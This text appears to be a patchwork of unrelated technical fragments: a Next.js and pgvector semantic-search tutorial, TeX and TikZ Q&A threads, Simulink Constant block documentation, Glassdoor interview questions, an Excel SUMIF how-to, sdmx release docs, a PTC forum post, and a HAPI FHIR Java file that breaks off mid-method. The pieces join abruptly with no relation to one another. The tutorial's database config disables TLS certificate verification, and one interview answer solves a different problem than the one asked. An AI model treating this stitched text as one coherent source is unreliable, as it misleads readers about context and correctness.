Today, we're taking a deep dive into the realm of AI-driven searches, using a powerful tech stack comprising Next.js, Sequelize, PostgreSQL, pgvector, and the OpenAI API. This comprehensive guide aims to equip you with the know-how to build a Next.js application that leverages these robust technologies to deliver advanced, AI-powered searches.
Semantic Similarity
So how does a vector search work? Here are the steps:
1. Vectorization: First, the text (or other data) is converted into vectors. This process, also known as "embedding", uses algorithms such as Word2Vec, FastText, BERT, or other transformers that can capture the context and semantic meaning of words or phrases and represent it in a numerical format. Each unique word or phrase is assigned a unique vector, which is just a set of numbers in a high-dimensional space.
2. Indexing: After converting the data to vectors, these vectors are stored in a vector database or a vector index. This index allows us to perform efficient nearest neighbor searches.
3. Nearest Neighbor Search: When a new query comes in, it's also converted into a vector using the same process. Then, the system performs a nearest neighbor search to find vectors that are closest to the query vector. The logic behind this is that semantically similar items will be closer in the vector space. The system uses measures such as cosine similarity or Euclidean distance to determine which vectors (and therefore which objects) are most similar to the query.
4. Return Results: The items associated with the nearest vectors are returned as the search results.
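As a rough sketch of steps 3 and 4 (using toy 3-dimensional vectors instead of real 1536-dimensional embeddings; the names are made up for illustration), a brute-force nearest-neighbor search using cosine similarity looks like this:

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two vectors: 1.0 means identical direction."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

def nearest(query, index):
    """Return document keys ordered from most to least similar to the query."""
    return sorted(index, key=lambda k: cosine_similarity(query, index[k]), reverse=True)

# Toy "index"; a production system would store these vectors in a vector database.
index = {
    "red shirt":  [0.9, 0.1, 0.0],
    "blue jeans": [0.1, 0.9, 0.1],
    "red dress":  [0.8, 0.2, 0.1],
}
print(nearest([1.0, 0.0, 0.0], index))  # ['red shirt', 'red dress', 'blue jeans']
```

A vector database essentially replaces this linear scan with an index structure, so the nearest-neighbor lookup stays fast as the collection grows.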
Project Requirements
We will need several packages to implement semantic search in our Next.js app:
1. pg: the node.js Postgres library
2. pg-hstore: A node package for serializing and deserializing JSON data to hstore format
3. pgvector: a simple NPM package for handling the vector data type in pg and sequelize
4. sequelize: a fantastic ORM (Object Relational Mapping) package
The project is bootstrapped using create-next-app@latest with typescript, tailwind and app router.
Step 1 - Create our ORM model and seed the database
First we need to define our Sequelize model. We'll start by creating a utility function to initialize Sequelize with the Postgres dialect:
// sequelize.ts
import { Sequelize } from 'sequelize';
import pg from 'pg';
import safe from 'colors';
const pgvector = require('pgvector/sequelize');
pgvector.registerType(Sequelize);
const logQuery = (query: string, options: any) => {
console.log(safe.bgGreen(new Date().toLocaleString()));
console.log(safe.bgYellow(options.bind));
console.log(safe.bgBlue(query));
return options;
}
const sequelize = new Sequelize(
process.env.DB_NAME!, // DB name
process.env.DB_USER!, // username
process.env.DB_PASS!, // password
{
host: process.env.DB_HOST,
port: parseInt(process.env.DB_PORT || '5432', 10),
dialect: 'postgres',
dialectModule: pg,
dialectOptions: {
ssl: {
require: true,
rejectUnauthorized: false
}
},
logging: process.env.NODE_ENV !== 'production' ? logQuery : false,
}
);
export default sequelize;
Note that we are calling registerType from the pgvector package. This gives the VECTOR data type to our model which we will define next:
// Product.model.ts
import sequelize from "@/utils/sequelize";
import { createEmbedding } from "@/utils/openai";
const pgvector = require('pgvector/utils');
// Types
import { DataTypes, Model } from "sequelize";
import { T_Product } from "./products";
class Product extends Model implements T_Product {
public id!: number;
public name!: string;
public slug!: string;
public description!: string;
public price!: number;
public image!: string;
public category!: string;
public embedding!: number[];
public createdAt!: Date;
public updatedAt!: Date;
public static async publicSearch(searchTerm: string, skip: number = 0, limit: number = 9999) {
const embedding = await createEmbedding(searchTerm);
const embSql = pgvector.toSql(embedding);
const results = await Product.findAll({
order: [
sequelize.literal(`"embedding" <-> '${embSql}'`),
],
offset: skip,
limit: limit,
attributes: {
exclude: ['embedding']
}
});
return results;
}
public static initModel(): void {
Product.init({
id: {
type: DataTypes.UUID,
defaultValue: DataTypes.UUIDV4,
primaryKey: true,
},
name: {
type: DataTypes.STRING,
allowNull: false,
},
slug: {
type: DataTypes.STRING,
allowNull: false,
},
description: {
type: DataTypes.TEXT,
allowNull: false,
},
price: {
type: DataTypes.INTEGER,
allowNull: false,
},
image: {
type: DataTypes.TEXT,
allowNull: false,
},
category: {
type: DataTypes.STRING,
allowNull: false,
},
embedding: {
// @ts-ignore
type: DataTypes.VECTOR(1536),
allowNull: true,
defaultValue: null
}
}, {
sequelize,
tableName: 'products',
timestamps: true,
paranoid: true,
underscored: true,
});
}
}
Product.initModel();
Product.addHook('beforeCreate', async (product: Product) => {
const input = product.name + '\n' + product.category + '\n' + product.description;
const embedding = await createEmbedding(input);
product.embedding = embedding;
if (product.price) {
product.price = parseInt(product.price.toString().replace('.', ''));
}
});
Product.addHook('beforeUpdate', async (product: Product) => {
const input = product.name + '\n' + product.category + '\n' + product.description;
const embedding = await createEmbedding(input);
product.embedding = embedding;
if (product.changed('price')) {
product.price = parseInt(product.price.toString().replace('.', ''));
}
});
export default Product;
Here, we've established a unique column named 'embedding', which has a type of VECTOR. Subsequently, we define a method called publicSearch that takes our query and transforms it into an embedding vector. Utilizing the toSql helper function from pgvector, we formulate our query. Instead of applying a where clause, we sort the outcomes using the <-> operator, an operator for comparing Euclidean distances. As a result, the most semantically relevant results appear first. We have the option to add pagination or limit the results, but our mock store contains only 20 products.
Additionally, we establish a beforeCreate and beforeUpdate hook that forms an embedding. We string together the product name, category, and description, and feed it into our OpenAI helper function, createEmbedding:
// openai.ts
import { Configuration, OpenAIApi } from "openai";
const config = new Configuration({
apiKey: process.env.OPENAI_KEY,
organization: process.env.OPENAI_ORG,
});
// Create embedding from string
export const createEmbedding = async (text: string) => {
const openai = new OpenAIApi(config);
const response = await openai.createEmbedding({
model: 'text-embedding-ada-002',
input: text,
});
return response.data.data[0].embedding;
}
In this approach, we employ the openai library to send a request to the text-embedding-ada-002 model, which is considered the superior embeddings model at the time of this writing. The process is fairly quick, typically requiring less than a second.
Now let's write a script to seed our database. We will be using fakestoreapi.com to get our data:
import Product from "@/models/Products.model";
import { createSlug } from "./format";
const seedProducts = async (): Promise<void> => {
try {
const response = await fetch('https://fakestoreapi.com/products');
if (!response.ok) {
throw new Error('Failed to fetch products');
}
const products = await response.json();
const productsData = products.map((product: any) => ({
name: product.title,
slug: createSlug(product.title),
description: product.description,
price: parseInt(product.price.toString().replace('.', '')),
image: product.image,
category: product.category,
}));
await Product.sync({ alter: true });
console.log('Product model synced!');
await Product.destroy({
where: {},
force: true,
});
console.log('All products deleted!');
for (const product of productsData) {
await Product.create(product);
}
console.log('Products seeded!');
} catch (err) {
console.log(err);
}
}
export default seedProducts;
This process will retrieve all 20 products from the mock store API. Afterward, it will initialize and/or empty our table, and then create a record for each product. Via our customized Sequelize hooks, an embedding will be automatically computed for each product!
And there you have it - quite straightforward! For the complete code of this sample project, you can check out the repository link provided below. Don't hesitate to clone it and give it a try!
Resources
1. GitHub Repo
2. Demo Site
Thank you for taking the time to read my article and I hope you found it useful (or at the very least, mildly entertaining). For more great information about web dev, systems administration and cloud computing, please read the Designly Blog. Also, please leave your comments! I love to hear thoughts from my readers.
I use Hostinger to host my clients' websites. You can get a business account that can host 100 websites at a price of $3.99/mo, which you can lock in for up to 48 months! It's the best deal in town. Services include PHP hosting (with extensions), MySQL, Wordpress and Email services.
Looking for a web developer? I'm available for hire! To inquire, please fill out a contact form.
TeX - LaTeX Stack Exchange is a question and answer site for users of TeX, LaTeX, ConTeXt, and related typesetting systems.
My document contains many short, justified lines, so the lines often appear with many spaces between words, e.g.:
These words have a space
so that they can fit nicely into the
available line.
In most situations, this is no problem, however, there are some select situations where I want a group of two or more words to appear together, even if other words in the lines are pulled apart, e.g., with "these words" linked:
These words have a space
so that they can fit nicely into the
available line.
How can this be done?
I'm looking for either a ConTeXt or TeX solution.
1 Answer
\hbox{These words} will do. Or, if you prefer a macro,
\def\nespace{\hskip\fontdimen2\font\relax}
and
These\nespace words
This space has no stretch or shrink component, but is the same as the normal interword space. If you want to add shrinkability:
\def\nespace{\hskip\fontdimen2\font minus\fontdimen4\font\relax}
The main difference between the \hbox approach and \nespace is that a line break can be taken at \nespace. Shouldn't you want it, just add \nobreak before \hskip as glue is not a feasible break point if preceded by discardable items and \nobreak adds a penalty, which is discardable.
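Putting the pieces together, a non-breaking variant of the macro along the lines of that note (a sketch, not from the original answer) would be:

```tex
\def\nespace{\nobreak\hskip\fontdimen2\font minus\fontdimen4\font\relax}
```

With \nobreak in place, TeX no longer treats the glue as a feasible break point, so the two words always stay on the same line.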
How about line breaks? Are they permitted at \nespace? – lockstep Apr 14 '12 at 12:19
@lockstep Yes, of course: any glue is a feasible line break point if it's not preceded by discardable items. In order not to break, one can add \nobreak before \hskip. – egreg Apr 14 '12 at 12:21
In that case, please point out the difference to \hbox in your answer. – lockstep Apr 14 '12 at 12:22
Constant
Generate constant value
• Library:
• Simulink / Commonly Used Blocks
Simulink / Sources
DSP System Toolbox / Sources
HDL Coder / Commonly Used Blocks
HDL Coder / Sources
• Constant block
Description
The Constant block generates a real or complex constant value signal. Use this block to provide a constant signal input. The block generates scalar, vector, or matrix output, depending on:
• The dimensionality of the Constant value parameter
• The setting of the Interpret vector parameters as 1-D parameter
The output of the block has the same dimensions and elements as the Constant value parameter. If you specify for this parameter a vector that you want the block to interpret as a vector, select the Interpret vector parameters as 1-D check box. Otherwise, if you specify a vector for the Constant value parameter, the block treats that vector as a matrix.
Tip
To output a constant enumerated value, consider using the Enumerated Constant (Simulink) block instead. The Constant block provides block parameters that do not apply to enumerated types, such as Output minimum and Output maximum.
Using Bus Objects as the Output Data Type
The Constant block supports nonvirtual buses as the output data type. Using a bus object as the output data type can help simplify your model. If you use a bus object as the output data type, set the Constant value to 0 or to a MATLAB® structure that matches the bus object.
Using Structures for the Constant Value of a Bus
The structure you specify must contain a value for every element of the bus represented by the bus object. The block output is a nonvirtual bus signal.
You can use the Simulink.Bus.createMATLABStruct (Simulink) to create a full structure that corresponds to a bus.
You can use Simulink.Bus.createObject (Simulink) to create a bus object from a MATLAB structure.
If the signal elements in the output bus use numeric data types other than double, you can specify the structure fields by using typed expressions such as uint16(37) or untyped expressions such as 37. To control the field data types, you can use the bus object as the data type of a Simulink.Parameter object. To decide whether to use typed or untyped expressions, see Control Data Types of Initial Condition Structure Fields (Simulink).
Setting Configuration Parameters to Support Using a Bus Object Data Type
To enable the use of a bus object as an output data type, before you start a simulation, set Configuration Parameters > Diagnostics > Data Validity > Advanced parameters > Underspecified initialization detection to Simplified. For more information, see Underspecified initialization detection (Simulink).
Ports
Output
Constant value, specified as a real or complex valued scalar, vector, matrix, or N-D array. By default, the Constant block outputs a signal whose dimensions, data type, and complexity are the same as those of the Constant value parameter. However, you can specify the output to be any data type that Simulink® supports, including fixed-point and enumerated data types.
Note
If you specify a bus object as the data type for this block, do not set the maximum value for bus data on the block. Simulink ignores this setting. Instead, set the maximum values for bus elements of the bus object specified as the data type. For more information, see Simulink.BusElement (Simulink).
Data Types: single | double | half | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 | Boolean | fixed point | enumerated | bus
Parameters
Main
Specify the constant value output of the block.
• You can enter any expression that MATLAB evaluates as a matrix, including the Boolean keywords true and false.
• If you set the Output data type to be a bus object, you can specify one of these options:
• A full MATLAB structure corresponding to the bus object
• 0 to indicate a structure corresponding to the ground value of the bus object
For details, see Using Bus Objects as the Output Data Type.
• For nonbus data types, Simulink converts this parameter from its value data type to the specified output data type offline, using a rounding method of nearest and overflow action of saturate.
Programmatic Use
Block Parameter: Value
Type: character vector
Value: scalar | vector | matrix | N-D array
Default: '1'
Select this check box to output a vector of length N if the Constant value parameter evaluates to an N-element row or column vector.
• When you select this check box, the block outputs a vector of length N if the Constant value parameter evaluates to an N-element row or column vector.
• When you clear this check box, the block does not output a vector of length N if the Constant value parameter evaluates to an N-element row or column vector. Instead, the block outputs a matrix of dimension 1-by-N or N-by-1.
Programmatic Use
Block Parameter: VectorParams1D
Type: character vector
Values: 'on' | 'off'
Default: 'on'
Specify the interval between times that the Constant block output can change during simulation (for example, due to tuning the Constant value parameter).
The default value of inf indicates that the block output can never change. This setting speeds simulation and generated code by avoiding the need to recompute the block output.
See Specify Sample Time (Simulink) for more information.
Programmatic Use
Block Parameter: SampleTime
Type: character vector
Values: scalar | vector
Default: 'inf'
Signal Attributes
Specify the lower value of the output range that Simulink checks as a finite, real, double, scalar value.
Note
If you specify a bus object as the data type for this block, do not set the minimum value for bus data on the block. Simulink ignores this setting. Instead, set the minimum values for bus elements of the bus object specified as the data type. For information on the Minimum parameter for a bus element, see Simulink.BusElement (Simulink).
Simulink uses the minimum to perform:
Note
Output minimum does not saturate or clip the actual output signal. Use the Saturation (Simulink) block instead.
Programmatic Use
Block Parameter: OutMin
Type: character vector
Values: scalar
Default: '[ ]'
Specify the upper value of the output range that Simulink checks as a finite, real, double, scalar value.
Note
If you specify a bus object as the data type for this block, do not set the maximum value for bus data on the block. Simulink ignores this setting. Instead, set the maximum values for bus elements of the bus object specified as the data type. For information on the Maximum parameter for a bus element, see Simulink.BusElement (Simulink).
Simulink uses the maximum value to perform:
Note
Output maximum does not saturate or clip the actual output signal. Use the Saturation (Simulink) block instead.
Programmatic Use
Block Parameter: OutMax
Type: character vector
Values: scalar
Default: '[ ]'
Specify the output data type. The type can be inherited, specified directly, or expressed as a data type object such as Simulink.NumericType.
Click the Show data type assistant button to display the Data Type Assistant, which helps you set the data type attributes. For more information, see Specify Data Types Using Data Type Assistant (Simulink).
Programmatic Use
Block Parameter: OutDataTypeStr
Type: character vector
Values: 'Inherit: Inherit from 'Constant value'' | 'Inherit: Inherit via back propagation' | 'double' | 'single' | 'half' | 'int8' | 'uint8' | 'int16' | 'uint16' | 'int32' | 'uint32' | 'int64' | 'uint64' | 'boolean' | 'fixdt(1,16)' | 'fixdt(1,16,0)' | 'fixdt(1,16,2^0,0)' | 'Enum: <class name>' | 'Bus: <object name>'
Default: 'Inherit: Inherit from 'Constant value''
Select this parameter to prevent the fixed-point tools from overriding the Output data type you specify on the block. For more information, see Use Lock Output Data Type Setting (Fixed-Point Designer).
Programmatic Use
Block Parameter: LockScale
Type: character vector
Values: 'off' | 'on'
Default: 'off'
Block Characteristics
Data Types: Boolean | bus | double | enumerated | fixed point | half | integer | single
Direct Feedthrough: no
Multidimensional Signals: yes
Variable-Size Signals: no
Zero-Crossing Detection: no
Extended Capabilities
C/C++ Code Generation
Generate C and C++ code using Simulink® Coder™.
PLC Code Generation
Generate Structured Text code using Simulink® PLC Coder™.
Fixed-Point Conversion
Design and simulate fixed-point systems using Fixed-Point Designer™.
Introduced before R2006a
Senior Software Developer Interview Questions | Glassdoor.com.ar
89 senior software developer interview questions shared by candidates
Top interview questions
Given an array of size n with range of numbers from 1 to n+1. The array doesn’t contain any duplicate, one number is missing, find the missing number.
2 answers
Traverse the array, use the absolute value of each element as an index, and negate the value at that index to mark it. If it is already negative, the element is a repeating one. For the missing number, traverse again and check which position still holds a positive value.

#include <stdio.h>
#include <stdlib.h>

void printTwoElements(int arr[], int size)
{
    int i;
    printf("\n element repeating: ");
    for (i = 0; i < size; i++)
    {
        if (arr[abs(arr[i]) - 1] > 0)
            arr[abs(arr[i]) - 1] = -arr[abs(arr[i]) - 1];
        else
            printf(" %d ", abs(arr[i]));
    }
    printf("\n missing one: ");
    for (i = 0; i < size; i++)
    {
        if (arr[i] > 0)
            printf("%d", i + 1);
    }
}

/* test method */
int main()
{
    int arr[] = {7, 3, 4, 5, 5, 6, 2};
    int n = sizeof(arr) / sizeof(arr[0]);
    printTwoElements(arr, n);
    return 0;
}
^ The description says there are no duplicates, so the answer above is wrong. If the numbers are ordered, you can just do a binary search and check whether (index + 1) matches the value at that index until you find the missing one (i.e. the first index where it does not match). That's likely the fastest way, O(log N).
How would I implement a reversible map in Java?
2 answers
Can you tell me a little about yourself? Why do you like to work here? Tell me about your most recent project? Any personal projects using Microsoft technology?
1 answer
English speaking
1 answer
What is the time complexity of Binary Search
1 answer
How to write an efficient method to calculate x raised to the power n, and implement a test method as well
1 answer
Given a number n, print all primes smaller than or equal to n. It is also given that n is a small number.
1 answer
What job profile I was looking for and my expected gross salary.
1 answer
The difference between class and object
1 answer
How does Node handle multiple threads?
1 answer
1-10 of 89 interview questions
Composite Output Table Template
Overview and Key Concepts
This composite template creates a table chart with a column that displays the combined throughput (usually output) of all included objects.
For more information about composite Output templates, see Output Templates.
Properties Panels
The Composite Output Table template uses the following properties panels:
How to sum cells by criteria
Excel 365
Use SUMIF if you need to sum values for a particular person or another criterion.
To sum cells by criteria, do the following:
1. Select the cell that will contain the result.
SUMIF example Excel 2016
2. Do one of the following:
• On the Formula tab, in the Function Library group, select the Math & Trig button:
Formula Excel 2016
Choose SUMIF in the list.
• Click the Insert Function button to the left of the Formula bar:
Edit bar Excel 2016
In the Insert Function dialog box:
Insert Function in Excel 2016
• select Math & Trig in the Or select a category drop-down list,
• select SUMIF in the Select a function list.
3. In the Function Arguments dialog box:
• The Range field determines the range of cells against which Excel will evaluate the criteria. In this example, the cell range is B2:B21.
• The Criteria is a conditional statement that is similar to the conditional statement in the IF statement.
• The Sum_range field tells Excel which cells to add when the criteria are met for each cell in the range. In this example, the cell range is D2:D21.
4. Press OK.
Notes:
• You can enter this formula using the keyboard, for this example:
=SUMIF(B2:B21, "*Revay", D2:D21)
• You can use the wildcard characters question mark (?) and asterisk (*) in the criteria. A question mark matches any single character; an asterisk matches any sequence of characters. If you want to find an actual question mark or asterisk, type a tilde (~) before the character. For example:
Mark example Excel 2016
• Microsoft Excel provides additional functions that can be used to analyze your data based on a condition or criteria:
• To count the number of occurrences of a string of text or a number within a range of cells, use the COUNTIF function (see How to count cells by criteria for more details).
• To have a formula return one of two values based on a condition, use the IF function.
• To analyze data in a list based on criteria, such as profit margins or product types, use the database and list management functions (DCOUNT, DCOUNTA, DSUM, etc.).
See also this tip in French: Comment calculer la somme des cellules par critères.
4
I want to draw a diagram like the one below, but I don't know how to draw an arrow that goes from one block to two blocks, like the one to source1/source2, or how to draw an arrow from two blocks to one block, like the one from source1/source2. Could someone help me please! (target diagram image)
This is what I can do to my best:
\tikzstyle{rect} = [draw, rectangle, minimum height = 4em, text width = 6em, text centered]
\tikzstyle{line} = [draw, -latex']
\begin{figure}
\begin{center}
\begin{tikzpicture}[node distance = 3cm, auto]
\node[rect](signal) {Signal};
\node[rect, right of=signal](STFT) {STFT};
\node[rect, right of=STFT](sep) {DNN/RNN};
\node[rect, right of=sep](speech) {$Source_1$};
\node[rect, below of=speech](music) {$Source_2$};
\node[rect, below of=sep](mask) {Time Frequencey Masking};
\node[rect, left of=mask](ISTFT) {ISTFT};
\node[rect, left of=ISTFT](eval) {Evaluation};
\path[line] (signal) -- (STFT);
\path[line] (STFT) -- (sep);
\path[line] (sep) -- (speech);
\path[line] (sep) -- (music);
\path[line] (mask) -- (ISTFT);
\path[line] (ISTFT) -- (eval);
\end{tikzpicture}
\end{center}
\end{figure}
3
• Please show us a partial solution you have tried.
– Matsmath
Jun 2, 2016 at 2:45
• Welcome! If you provide the code for the diagram without the problematic arrows, somebody will be happy to show you how to do the arrows. It isn't really fair to expect people to draw the whole thing from scratch. There are a lot of questions about drawing this kind of diagram, though, so it is puzzling that you've not found anything to help already.
– cfr
Jun 2, 2016 at 2:46
• 2
Personally, I don't think the diagram is very clear as it is drawn at all. Why is there an arrow from nowhere to Time Frequency Masking? That doesn't make sense to me. But maybe this is standard notation and nothingness has special symbolic value here.
– cfr
Jun 2, 2016 at 2:51
1 Answer 1
7
Something like this:
(rendered diagram)
Code:
\documentclass[tikz, border=3mm]{standalone}
\usetikzlibrary{arrows, chains, fit, positioning, scopes}
\begin{document}
\begin{tikzpicture}[
> = angle 90,
node distance = 6mm and 8mm,
box/.style = {draw, minimum height=10mm, minimum width=27mm,
align=center, join=by ->, on chain},
font = \sffamily
]
{ [start chain = A going right]
\node[on chain] {Signal};
\node[box] {STFT/log-mel};
\node[box] {DNN/RNN};
}
{ [start chain = B going left]
\node[box,below=of A-3]
{Time Frequency\\ Masking};
\node[box] {ISTFT};
\node[box] {Evaluation};
}
\node (s1) [right=of A-3.north east] {Source\textsubscript{1}};
\node (s2) [right=of A-3.south east] {Source\textsubscript{2}};
%
\node[draw, dotted, inner sep = 5mm, xshift=1mm, fit=(A-3) (B-1) (s1)] {};
\draw (A-3.east) -- ++ (4mm,0) coordinate (s0);
\draw[->] (s0) |- (s1);
\draw[->] (s0) |- (s2);
\draw[->] (A-3 -| s1.east) -- + (4mm,0) |- (B-1);
\end{tikzpicture}
\end{document}
The nodes' positions are determined using the chains library and scopes. Two chains are formed: A and B. Arrows between nodes in the chains are drawn by the option join=by -> in the box style. The arrows connecting chain A with the nodes "Source_1" and "Source_2" are drawn separately. The |- syntax is used for drawing perpendicular lines.
Edit: I noticed a spelling error, which is now corrected. I also used the correction as an opportunity to slightly change the drawing (all nodes are now the same size).
Development
***********

This page describes the development of :mod:`sdmx`. Contributions are welcome!

- For current development priorities, see the list of `GitHub milestones `_ and issues/PRs targeted to each.
- For wishlist features, see issues on GitHub tagged `'enh' `_ or `'wishlist' `_.

.. _code-style:

Code style
==========

- This project uses, via `pre-commit `_:

  - `ruff `_ for code style and linting, including:

    - ensure `PEP 8 `_ compliance, and
    - ensure a consistent order for imports (superseding `flake8 `_ and `isort `_).

  - `mypy `_ for static type checking.

  These **must** be applied to new or modified code. This can be done manually, or through code editor plug-ins. `Pre-commit hooks for git `_ can be installed via:

  .. code-block:: shell

     pip install pre-commit
     pre-commit install

  These will ensure that each commit is compliant with the code style.

- The `pytest.yaml GitHub Actions workflow `_ checks code quality for pull requests and commits. This check **must** pass for pull requests to be merged.
- Follow `the 7 rules of a great Git commit message `_.
- Write docstrings in the `numpydoc `_ style.

.. _testing:

Test specimens
==============

.. versionadded:: 2.0

A variety of *specimens*—example files from real web services, or published with the standards—are used to test that :mod:`sdmx` correctly reads and writes the different SDMX message formats. Since v2.0, specimens are stored in the separate `sdmx-test-data `_ repository.

Running the test suite requires these files. To retrieve them, use one of the following methods:

1. Obtain the files by one of two methods:

   a. Clone ``khaeru/sdmx-test-data``::

         $ git clone git@github.com:khaeru/sdmx-test-data.git

   b. Download https://github.com/khaeru/sdmx-test-data/archive/main.zip

2. Indicate where pytest can find the files, by one of two methods:

   a. Set the `SDMX_TEST_DATA` environment variable::

         # Set the variable only for one command
         $ SDMX_TEST_DATA=/path/to/files pytest

         # Export the variable to the environment
         $ export SDMX_TEST_DATA
         $ pytest

   b. Give the option ``--sdmx-test-data=`` when invoking pytest::

         $ pytest --sdmx-test-data=/path/to/files

The files are:

- Arranged in directories with names matching particular sources in :file:`sources.json`.
- Named with:

  - Certain keywords:

    - ``-structure``: a structure message, often associated with a file with a similar name containing a data message.
    - ``ts``: time-series data, i.e. with a TimeDimensions at the level of individual Observations.
    - ``xs``: cross-sectional data arranged in other ways.
    - ``flat``: flat DataSets with all Dimensions at the Observation level.
    - ``ss``: structure-specific data messages.

  - In some cases, the query string or data flow/structure ID as the file name.
  - Hyphens ``-`` instead of underscores ``_``.

Releasing
=========

Before releasing, check:

- https://github.com/khaeru/sdmx/actions?query=workflow:test+branch:main to ensure that the push and scheduled builds are passing.
- https://readthedocs.org/projects/sdmx1/builds/ to ensure that the docs build is passing.

Address any failures before releasing.

1. Create a new branch::

      $ git checkout -b release/X.Y.Z

2. Edit :file:`doc/whatsnew.rst`. Comment the heading "Next release", then insert another heading below it, at the same level, with the version number and date.

3. Make a commit with a message like "Mark vX.Y.Z in doc/whatsnew".

4. Tag the version as a release candidate, i.e. with a ``rcN`` suffix, and push::

      $ git tag vX.Y.ZrcN
      $ git push --tags --set-upstream origin release/X.Y.Z

5. Open a pull request with the title “Release vX.Y.Z” using this branch. Check:

   - at https://github.com/khaeru/sdmx/actions?query=workflow:publish that the workflow completes: the package builds successfully and is published to TestPyPI.
   - at https://test.pypi.org/project/sdmx1/ that:

     - The package can be downloaded, installed and run.
     - The README is rendered correctly.

   If needed, address any warnings or errors that appear and then continue from step (3), i.e. make (a) new commit(s) and tag, incrementing the release candidate number, e.g. from ``rc1`` to ``rc2``.

6. Merge the PR using the “rebase and merge” method.

7. (optional) Tag the release itself and push::

      $ git tag vX.Y.Z
      $ git push --tags origin main

   This step (but *not* step (3)) can also be performed directly on GitHub; see (7), next.

8. Visit https://github.com/khaeru/sdmx/releases and mark the new release: either using the pushed tag from (7), or by creating the tag and release simultaneously.

9. Check at https://github.com/khaeru/sdmx/actions?query=workflow:publish and https://pypi.org/project/sdmx1/ that the distributions are published.

Internal code reference
=======================

.. automodule:: sdmx.dictlike
   :noindex:
   :undoc-members:
   :show-inheritance:

``testing``: Testing utilities
------------------------------

.. automodule:: sdmx.testing
   :members:
   :undoc-members:
   :show-inheritance:

``util``: Utilities
-------------------

.. automodule:: sdmx.util
   :noindex:
   :undoc-members:
   :show-inheritance:

Inline TODOs
============

.. todolist::
Special characters get corrupted
JAZOZevenaarbv
5-Regular Member
With Wildfire 4.0 we're having trouble with special characters like Ø, ü, é.
We are using Wildfire 4.0 x64, Intralink 3.4 M040, Windows 7 x64
This is what happens:
1. make a new Part
2. select a designated parameter and change it's value to a text containing some special characters
3. save the part
4. erase everything from memory
5. open the part
6. examine the parameter value, it's different now
Before: (screenshot Before_save.jpg)
After: (screenshot After_open.jpg)
Anyone any idea why this is happening?
This thread is inactive and closed by the PTC Community Management Team. If you would like to provide a reply and re-open this thread, please notify the moderator and reference the thread. You may also use "Start a topic" button to ask a new question. Please be sure to include what version of the PTC product you are using so another community member knowledgeable about your version may be able to assist.
0 REPLIES 0
View Javadoc
1 package ca.uhn.fhir.jpa.dao;
2
3 /*
4 * #%L
5 * HAPI FHIR JPA Server
6 * %%
7 * Copyright (C) 2014 - 2018 University Health Network
8 * %%
9 * Licensed under the Apache License, Version 2.0 (the "License");
10 * you may not use this file except in compliance with the License.
11 * You may obtain a copy of the License at
12 *
13 * http://www.apache.org/licenses/LICENSE-2.0
14 *
15 * Unless required by applicable law or agreed to in writing, software
16 * distributed under the License is distributed on an "AS IS" BASIS,
17 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
18 * See the License for the specific language governing permissions and
19 * limitations under the License.
20 * #L%
21 */
22
23 import ca.uhn.fhir.context.FhirContext;
24 import ca.uhn.fhir.context.RuntimeResourceDefinition;
25 import ca.uhn.fhir.context.RuntimeSearchParam;
26 import ca.uhn.fhir.jpa.search.JpaRuntimeSearchParam;
27 import ca.uhn.fhir.util.StopWatch;
28 import ca.uhn.fhir.rest.api.server.IBundleProvider;
29 import ca.uhn.fhir.util.SearchParameterUtil;
30 import org.apache.commons.lang3.StringUtils;
31 import org.apache.commons.lang3.time.DateUtils;
32 import org.hl7.fhir.instance.model.api.IBaseResource;
33 import org.slf4j.Logger;
34 import org.slf4j.LoggerFactory;
35 import org.springframework.beans.BeansException;
36 import org.springframework.beans.factory.annotation.Autowired;
37 import org.springframework.context.ApplicationContext;
38 import org.springframework.context.ApplicationContextAware;
39 import org.springframework.scheduling.annotation.Scheduled;
40
41 import javax.annotation.PostConstruct;
42 import java.util.*;
43
44 import static org.apache.commons.lang3.StringUtils.isBlank;
45
46 public abstract class BaseSearchParamRegistry<SP extends IBaseResource> implements ISearchParamRegistry, ApplicationContextAware {
47
48 private static final int MAX_MANAGED_PARAM_COUNT = 10000;
49 private static final Logger ourLog = LoggerFactory.getLogger(BaseSearchParamRegistry.class);
50 private Map<String, Map<String, RuntimeSearchParam>> myBuiltInSearchParams;
51 private volatile Map<String, List<JpaRuntimeSearchParam>> myActiveUniqueSearchParams = Collections.emptyMap();
52 private volatile Map<String, Map<Set<String>, List<JpaRuntimeSearchParam>>> myActiveParamNamesToUniqueSearchParams = Collections.emptyMap();
53 @Autowired
54 private FhirContext myCtx;
55 private Collection<IFhirResourceDao<?>> myResourceDaos;
56 private volatile Map<String, Map<String, RuntimeSearchParam>> myActiveSearchParams;
57 @Autowired
58 private DaoConfig myDaoConfig;
59 private volatile long myLastRefresh;
60 private ApplicationContext myApplicationContext;
61
62 public BaseSearchParamRegistry() {
63 super();
64 }
65
66 @Override
67 public void requestRefresh() {
68 synchronized (this) {
69 myLastRefresh = 0;
70 }
71 }
72
73 @Override
74 public void forceRefresh() {
75 requestRefresh();
76 refreshCacheIfNecessary();
77 }
78
79 @Override
80 public RuntimeSearchParam getActiveSearchParam(String theResourceName, String theParamName) {
81 RuntimeSearchParam retVal = null;
82 Map<String, RuntimeSearchParam> params = getActiveSearchParams().get(theResourceName);
83 if (params != null) {
84 retVal = params.get(theParamName);
85 }
86 return retVal;
87 }
88
89
90 @Override
91 public Map<String, Map<String, RuntimeSearchParam>> getActiveSearchParams() {
92 return myActiveSearchParams;
93 }
94
95 @Override
96 public Map<String, RuntimeSearchParam> getActiveSearchParams(String theResourceName) {
97 return myActiveSearchParams.get(theResourceName);
98 }
99
100 @Override
101 public List<JpaRuntimeSearchParam> getActiveUniqueSearchParams(String theResourceName) {
102 List<JpaRuntimeSearchParam> retVal = myActiveUniqueSearchParams.get(theResourceName);
103 if (retVal == null) {
104 retVal = Collections.emptyList();
105 }
106 return retVal;
107 }
108
109 @Override
110 public List<JpaRuntimeSearchParam> getActiveUniqueSearchParams(String theResourceName, Set<String> theParamNames) {
111
112 Map<Set<String>, List<JpaRuntimeSearchParam>> paramNamesToParams = myActiveParamNamesToUniqueSearchParams.get(theResourceName);
113 if (paramNamesToParams == null) {
114 return Collections.emptyList();
115 }
116
117 List<JpaRuntimeSearchParam> retVal = paramNamesToParams.get(theParamNames);
